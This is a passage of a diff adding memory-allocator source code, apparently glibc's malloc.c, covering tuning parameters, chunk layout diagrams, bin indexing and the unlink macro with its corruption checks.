+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr ("corrupted size vs. prev_size");			      \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr ("corrupted double-linked list");			      \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr ("corrupted double-linked list (not small)");   \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
